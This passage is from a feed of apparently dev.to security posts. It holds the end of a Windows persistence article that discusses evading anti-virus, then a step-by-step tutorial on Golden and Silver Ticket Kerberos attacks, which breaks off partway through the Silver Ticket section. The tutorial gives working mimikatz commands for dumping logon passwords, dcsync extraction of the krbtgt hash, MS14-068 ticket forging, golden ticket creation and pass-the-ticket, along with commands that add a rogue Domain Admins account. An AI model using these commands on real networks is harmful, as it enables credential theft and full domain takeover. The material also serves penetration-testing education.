&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F37csufc6hx3qth3fqzv2.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F37csufc6hx3qth3fqzv2.png" alt=" " width="800" height="588"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  0x0B Conclusion
&lt;/h2&gt;

&lt;p&gt;Initially, approximately twenty persistence techniques were catalogued, but in practice many are not universally applicable—some are limited to specific scenarios, particular configurations, or certain applications. Others are "passive" persistence methods, such as shortcut replacement; aside from exploiting a shortcut vulnerability, they will not trigger unless the target clicks them. Therefore, those with significant limitations were removed to streamline the article (and reduce workload), resulting in the ten techniques presented above, which are relatively generic.&lt;br&gt;&lt;br&gt;
During the collation process, a frustration at the Ring3 level became evident: user‑mode persistence that aims for high stealth and evasion of behavioural detection by anti‑virus must rely on native Windows functionality (living off the land). If these features or modules are disabled, uninstalled, or fail to start normally in special environments, the approach becomes problematic. Thus, preparing multiple methods is always beneficial.&lt;br&gt;&lt;br&gt;
Due to time constraints, some DLLs required for demonstration were directly generated by MSF, but their evasion capabilities are unsatisfactory. When developing the CS plugin later, these DLLs must be completed and subjected to further anti‑virus treatment.&lt;/p&gt;

</description>
      <category>windows</category>
      <category>persistence</category>
      <category>cybersecurity</category>
      <category>techniques</category>
    </item>
    <item>
      <title>Ticket Passing Attacks</title>
      <dc:creator>Excalibra</dc:creator>
      <pubDate>Wed, 10 Jun 2026 03:06:18 +0000</pubDate>
      <link>https://dev.to/excalibra/ticket-passing-attacks-f77</link>
      <guid>https://dev.to/excalibra/ticket-passing-attacks-f77</guid>
      <description>&lt;p&gt;This section introduces two common attack methods within a domain: the Golden Ticket and the Silver Ticket.&lt;/p&gt;

&lt;p&gt;Furthermore, readers familiar with the Kerberos authentication process will find the principles of these two attacks considerably easier to comprehend. For those who have not previously studied Kerberos authentication, it is recommended to familiarize on the Kerberos Authentication Process.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Related Tools&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/abatchy17/WindowsExploits/tree/master/MS14-068" rel="noopener noreferrer"&gt;Ms14‑068&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/crupper/Forensics-Tool-Wiki/blob/master/windowsTools/PsExec64.exe" rel="noopener noreferrer"&gt;PSexec&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/gentilkiwi/mimikatz/" rel="noopener noreferrer"&gt;mimikatz&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Golden Ticket
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Principle
&lt;/h3&gt;

&lt;p&gt;During Kerberos authentication, after the Client authenticates with the Authentication Service (AS), the AS issues a Logon Session Key and a Ticket‑Granting Ticket (TGT) to the Client. The Logon Session Key is not retained within the Key Distribution Centre (KDC), whereas the NTLM hash of the &lt;code&gt;krbtgt&lt;/code&gt; account is fixed. Consequently, if an attacker obtains the NTLM hash of &lt;code&gt;krbtgt&lt;/code&gt;, it becomes possible to forge both a TGT and the corresponding Logon Session Key, thereby enabling the Client to proceed to the interaction with the Ticket‑Granting Service (TGS). Possession of a Golden Ticket permits the bypass of AS validation entirely; neither account name nor password is verified, and the attacker remains unaffected even if the domain administrator password is subsequently changed.&lt;/p&gt;

&lt;h3&gt;
  
  
  Characteristics
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;Does not require any interaction with the AS.&lt;/li&gt;
&lt;li&gt;Requires the NTLM hash of the &lt;code&gt;krbtgt&lt;/code&gt; user.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Detailed Procedure
&lt;/h3&gt;

&lt;h4&gt;
  
  
  1. Forging Credentials to Escalate Privileges of a Domain User
&lt;/h4&gt;

&lt;p&gt;Assume that an attacker has logged on to a host within the domain as a local &lt;code&gt;Administrator&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fi4t6flxk0seonteslcxf.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fi4t6flxk0seonteslcxf.png" alt=" " width="235" height="35"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The command &lt;code&gt;net config workstation&lt;/code&gt; reveals, among other details, that the domain is named &lt;code&gt;cyberpeace&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fphks358rtygyzxvchjkc.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fphks358rtygyzxvchjkc.png" alt=" " width="599" height="232"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The command &lt;code&gt;nltest /dsgetdc:domain&lt;/code&gt; identifies the Domain Controller hostname as &lt;code&gt;scene&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvcq9w2rgf622sm7f6m09.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvcq9w2rgf622sm7f6m09.png" alt=" " width="423" height="145"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Mimikatz is uploaded and executed with administrator privileges:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight batchfile"&gt;&lt;code&gt;&lt;span class="kd"&gt;mimikatz&lt;/span&gt;&lt;span class="err"&gt;.exe&lt;/span&gt; &lt;span class="s2"&gt;"privilege::debug"&lt;/span&gt; &lt;span class="s2"&gt;"sekurlsa::logonpasswords"&lt;/span&gt; &lt;span class="s2"&gt;"exit"&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="kd"&gt;log&lt;/span&gt;.txt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Examination of the generated &lt;code&gt;log.txt&lt;/code&gt; reveals a domain user account, &lt;code&gt;devuser&lt;/code&gt;, with the password &lt;code&gt;HOTdev123456&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fomah489t994ykpt7t680.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fomah489t994ykpt7t680.png" alt=" " width="246" height="72"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Logging in as &lt;code&gt;devuser&lt;/code&gt; and running &lt;code&gt;whoami&lt;/code&gt; confirms the current user context.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fog0797dfke41zkikgl48.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fog0797dfke41zkikgl48.png" alt=" " width="150" height="21"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The presence of the MS14‑068 vulnerability (CVE‑2014‑6324, addressed by patch 3011780) is checked with the command &lt;code&gt;systeminfo | find "3011780"&lt;/code&gt;. An empty result indicates the patch is absent and the system is vulnerable. It should be noted that privilege escalation using this vulnerability is time‑limited.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdgcdepslpnsdush2r4n4.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdgcdepslpnsdush2r4n4.png" alt=" " width="461" height="64"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;An attempt to access the administrative share on the domain controller with &lt;code&gt;dir \\scene.cyberpeace.com\c$&lt;/code&gt; fails owing to insufficient permissions.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fp4ipntgpaad5a3zbvz4u.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fp4ipntgpaad5a3zbvz4u.png" alt=" " width="535" height="46"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The MS14‑068 exploit tool and mimikatz are uploaded. The user’s SID is obtained using either &lt;code&gt;whoami /user&lt;/code&gt; or &lt;code&gt;whoami /all&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmtco6b9r8ea5q33nguft.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmtco6b9r8ea5q33nguft.png" alt=" " width="799" height="249"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The MS14‑068 tool is used to forge a ticket:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight batchfile"&gt;&lt;code&gt;&lt;span class="kd"&gt;C&lt;/span&gt;:\MS14&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="m"&gt;068&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="kd"&gt;MS14&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="m"&gt;068&lt;/span&gt;.exe &lt;span class="na"&gt;-u &lt;/span&gt;&lt;span class="kd"&gt;devuser&lt;/span&gt;@cyberpeace.com &lt;span class="na"&gt;-p &lt;/span&gt;&lt;span class="kd"&gt;HOTdev123456&lt;/span&gt; &lt;span class="na"&gt;-s &lt;/span&gt;&lt;span class="kd"&gt;S&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="m"&gt;1&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="m"&gt;5&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="m"&gt;21&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="m"&gt;97341123&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="m"&gt;1865264218&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="m"&gt;933115267&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="m"&gt;1108&lt;/span&gt; &lt;span class="na"&gt;-d &lt;/span&gt;&lt;span class="kd"&gt;scene&lt;/span&gt;.cyberpeace.com
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;A TGT ticket file is generated in the current directory. The general usage is:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;ms14-068.exe &lt;span class="nt"&gt;-u&lt;/span&gt; &amp;lt;domain_user&amp;gt;@&amp;lt;domain&amp;gt; &lt;span class="nt"&gt;-p&lt;/span&gt; &amp;lt;password&amp;gt; &lt;span class="nt"&gt;-s&lt;/span&gt; &amp;lt;user_SID&amp;gt; &lt;span class="nt"&gt;-d&lt;/span&gt; &amp;lt;domain_controller&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Within mimikatz, the existing Kerberos ticket cache is purged and the forged ticket is imported:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight powershell"&gt;&lt;code&gt;&lt;span class="n"&gt;mimikatz&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="c"&gt;# kerberos::purge&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="n"&gt;mimikatz&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="c"&gt;# kerberos::ptc &amp;lt;path_to_ticket_file&amp;gt;&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmkloxfa1l96j1e4y3bct.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmkloxfa1l96j1e4y3bct.png" alt=" " width="644" height="260"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The command &lt;code&gt;dir \\scene.cyberpeace.com\c$&lt;/code&gt; now executes successfully, demonstrating that domain administrator privileges have been obtained.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmjkbrf5mn6wabc2xvexb.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmjkbrf5mn6wabc2xvexb.png" alt=" " width="530" height="194"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;A new domain administrator account, &lt;code&gt;aaa&lt;/code&gt;, is created:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;net user aaa Qwe123... /add /domain
net group &lt;span class="s2"&gt;"Domain Admins"&lt;/span&gt; aaa /add /domain
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  2. Forging a Golden Ticket
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Prerequisites for forging a Golden Ticket&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Domain name&lt;/li&gt;
&lt;li&gt;Domain SID value&lt;/li&gt;
&lt;li&gt;NTLM hash of the &lt;code&gt;krbtgt&lt;/code&gt; account&lt;/li&gt;
&lt;li&gt;Arbitrary username to be forged&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Logging in as the domain administrator &lt;code&gt;aaa&lt;/code&gt; and executing &lt;code&gt;whoami&lt;/code&gt; confirms the identity.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3raa2yei5ssykds6wvfb.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3raa2yei5ssykds6wvfb.png" alt=" " width="220" height="40"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The NTLM hash of &lt;code&gt;krbtgt&lt;/code&gt; is extracted using the following mimikatz commands:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;mimikatz&lt;span class="o"&gt;(&lt;/span&gt;commandline&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="c"&gt;# privilege::debug&lt;/span&gt;
mimikatz&lt;span class="o"&gt;(&lt;/span&gt;commandline&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="c"&gt;# lsadump::dcsync /domain:cyberpeace.com /all /csv&lt;/span&gt;
mimikatz&lt;span class="o"&gt;(&lt;/span&gt;commandline&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="c"&gt;# lsadump::dcsync /domain:cyberpeace.com /user:krbtgt&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftj0p56h58vab3coyys8r.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftj0p56h58vab3coyys8r.png" alt=" " width="590" height="326"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The SID of the &lt;code&gt;krbtgt&lt;/code&gt; account is displayed in the output.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5937ui5jej3ouknplvh3.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5937ui5jej3ouknplvh3.png" alt=" " width="535" height="216"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Mimikatz is then employed to generate the Golden Ticket and save it as a &lt;code&gt;.kirbi&lt;/code&gt; file:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;mimikatz.exe &lt;span class="s2"&gt;"kerberos::golden /admin:system /domain:cyberpeace.com /sid:S-1-5-21-97341123-1865264218-933115267 /krbtgt:95972cdf7b8dde854e74c1871f6d80a0 /ticket:ticket.kirbi"&lt;/span&gt; &lt;span class="nb"&gt;exit&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;/admin&lt;/code&gt; : forged username&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;/domain&lt;/code&gt; : domain name&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;/sid&lt;/code&gt; : domain SID (note: the last component after the final hyphen is omitted)&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;/krbtgt&lt;/code&gt; : NTLM hash of &lt;code&gt;krbtgt&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;/ticket&lt;/code&gt; : name of the generated ticket file&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnefe10t7ap6ooruk9e7l.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnefe10t7ap6ooruk9e7l.png" alt=" " width="800" height="145"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  3. Using the Golden Ticket (Creating a Domain Admin Account from a Standard Domain Account)
&lt;/h4&gt;

&lt;p&gt;The attacker logs into the domain with an ordinary user account. Using mimikatz, the previously generated &lt;code&gt;ticket.kirbi&lt;/code&gt; is loaded into memory:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight powershell"&gt;&lt;code&gt;&lt;span class="n"&gt;mimikatz&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="c"&gt;# kerberos::purge&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="n"&gt;mimikatz&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="c"&gt;# kerberos::ptt ticket.kirbi&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftkredn349ltvr6jas0md.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftkredn349ltvr6jas0md.png" alt=" " width="365" height="112"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;At this point, an attempt to create a domain administrator account named &lt;code&gt;ccc&lt;/code&gt; succeeds.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8u6sfitdwhd6bbcbau19.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8u6sfitdwhd6bbcbau19.png" alt=" " width="642" height="143"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Silver Ticket
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Principle
&lt;/h3&gt;

&lt;p&gt;If the Golden Ticket represents a forged TGT, then the Silver Ticket corresponds to a forged Service Ticket (ST). During the third stage of Kerberos authentication, the Client presents the ST together with &lt;code&gt;Authenticator3&lt;/code&gt; to a service hosted on a particular server. The server decrypts the ST using its own Master Key (derived from the service account’s hash) to obtain the Session Key. It then decrypts &lt;code&gt;Authenticator3&lt;/code&gt; with that Session Key to verify the Client’s identity. If verification succeeds, the Client is granted access to the designated service.  &lt;/p&gt;

&lt;p&gt;Thus, if an attacker knows the NTLM hash of the service account associated with the target server, a valid ST can be forged without any communication with the KDC. However, such a forged ticket is functional only for the specific service for which it was crafted.&lt;/p&gt;

&lt;h3&gt;
  
  
  Characteristics
&lt;/h3&gt;

&lt;ol&gt;
&lt;li&gt;Does not require interaction with the KDC.&lt;/li&gt;
&lt;li&gt;Requires the NTLM hash of the target service account.&lt;/li&gt;
&lt;/ol&gt;

&lt;h3&gt;
  
  
  Detailed Procedure
&lt;/h3&gt;

&lt;h4&gt;
  
  
  1. Forging Credentials to Escalate Privileges of a Domain User
&lt;/h4&gt;

&lt;p&gt;Again, the attack begins from a local &lt;code&gt;Administrator&lt;/code&gt; account on a domain‑joined host.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgwosz5hqezyi0lkafqko.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgwosz5hqezyi0lkafqko.png" alt=" " width="252" height="43"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The command &lt;code&gt;net config workstation&lt;/code&gt; reveals the domain name as &lt;code&gt;cyberpeace&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgxog8l3qubdjyzk3iq55.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgxog8l3qubdjyzk3iq55.png" alt=" " width="591" height="226"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The domain controller hostname &lt;code&gt;scene&lt;/code&gt; is obtained with &lt;code&gt;nltest /dsgetdc:domain&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fb8zwg41o4l7y5ccvpxe2.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fb8zwg41o4l7y5ccvpxe2.png" alt=" " width="427" height="145"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Mimikatz is executed with administrator rights:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight batchfile"&gt;&lt;code&gt;&lt;span class="kd"&gt;mimikatz&lt;/span&gt;&lt;span class="err"&gt;.exe&lt;/span&gt; &lt;span class="s2"&gt;"privilege::debug"&lt;/span&gt; &lt;span class="s2"&gt;"sekurlsa::logonpasswords"&lt;/span&gt; &lt;span class="s2"&gt;"exit"&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="kd"&gt;log&lt;/span&gt;.txt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The log file shows a domain user account, &lt;code&gt;Hellen&lt;/code&gt;, with the password &lt;code&gt;Hellen1818&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Faezbgtmz4pe0j1aiw77t.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Faezbgtmz4pe0j1aiw77t.png" alt=" " width="231" height="42"&gt;&lt;/a&gt;&lt;/p&gt;

